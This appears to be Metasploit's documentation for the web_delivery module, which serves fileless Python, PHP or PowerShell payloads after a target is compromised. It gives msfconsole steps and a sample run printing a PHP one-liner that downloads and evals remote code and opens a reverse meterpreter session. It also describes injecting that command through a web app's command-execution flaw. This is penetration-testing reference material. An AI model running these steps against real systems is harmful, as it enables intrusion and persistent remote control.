adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
11964c5c1a2f22ade03e2f5d2e01dce609848939
metasploit-gs/documentation/modules/exploit/multi/script/web_delivery.md
T
wchen-r7 11964c5c1a Add remote exploit demo and web_delivery doc
2016-03-02 19:52:11 -06:00

3.3 KiB
Raw Blame History

As a web server, web_delivery provides a great way to deliver a payload during post exploitation, with the intention to stay stealthy because the payload does not touch the disk.

Currently, web_delivery supports three different languages for delivery: Python, PHP, and Powershell. You should be able to tell which one you can use based on the target environment you are in.

For example: if you have gained access through a PHP application, then it's safe to assume you can use PHP. If you're in a Windows server (such as Windows Server 2008), then it's probably safe to say the target supports Powershell.

Verification Steps

To be able to use web_delivery, you must gain access to the target machine first, wit the ability to execute either the Python, or PHP, or Powershell interpreter.

At that point, you would use web_delivery similar to the following example:

  1. Start msfconsole
  2. Do: use exploit/multi/script/web_delivery
  3. Do: set target 1 (1 is PHP. You can use show targets to see other options)
  4. Do: set PAYLOAD php/meterpreter/reverse_tcp (You can do show payloads to see what options are suitable for the target)
  5. Do: set LHOST IP (The IP the payload should connect back to)
  6. Do: run
  7. At this point, a handler is up for that payload. And the module should instruct you to execute a command.
  8. Copy the command. Depending on your pentesting scenario, typically you can either inject the command and get code execution, or run it from the target's shell, and get a session:
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.23.1:4444 
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/z5inGkwCCQiz9
[*] Local IP: http://10.6.0.86:8080/z5inGkwCCQiz9
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/z5inGkwCCQiz9'));"
[*] Delivering Payload
[*] Sending stage (33684 bytes) to 172.16.23.134
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.134:41684) at 2016-03-02 11:41:34 -0600

Targets

Python

Python is a fairly popular language, especially on unix-based systems. For example, it comes with Ubuntu Linux by default since 8.04. As well as Debian, and Mac OS X since 10.3.

PHP

PHP is a fairly popular language for web servers, especially Apache.

Powershell/win

Powershell is a popular language for newer Windows systems. Windows 7 and Windows Server 2008 R2 are the first Windows versions to come with Powershell by default, and not older systems.

Scenarios

Against a compromised web application

web_delivery would work nicely for a web application with a command execution vulnerability.

One way to approach this would be:

  1. Start exploit/multi/script/web_delivery
  2. Use Burp Suite to intercept the HTTP/HTTPS request, place the command in the parameter that results in arbitrary code execution.
  3. Hopefully the modified HTTP/HTTPS request is successful, and you should get a session.

Shell upgrade

web_delivery is also useful to upgrade a shell type payload to a meterpreter one.

Here's how that can be done:

  1. Start exploit/multi/script/web_delivery that generates/
  2. On msfconsole, interact with the shell, and copy/pate the command.
  3. You should get a meterpreter session.
Reference in New Issue View Git Blame Copy Permalink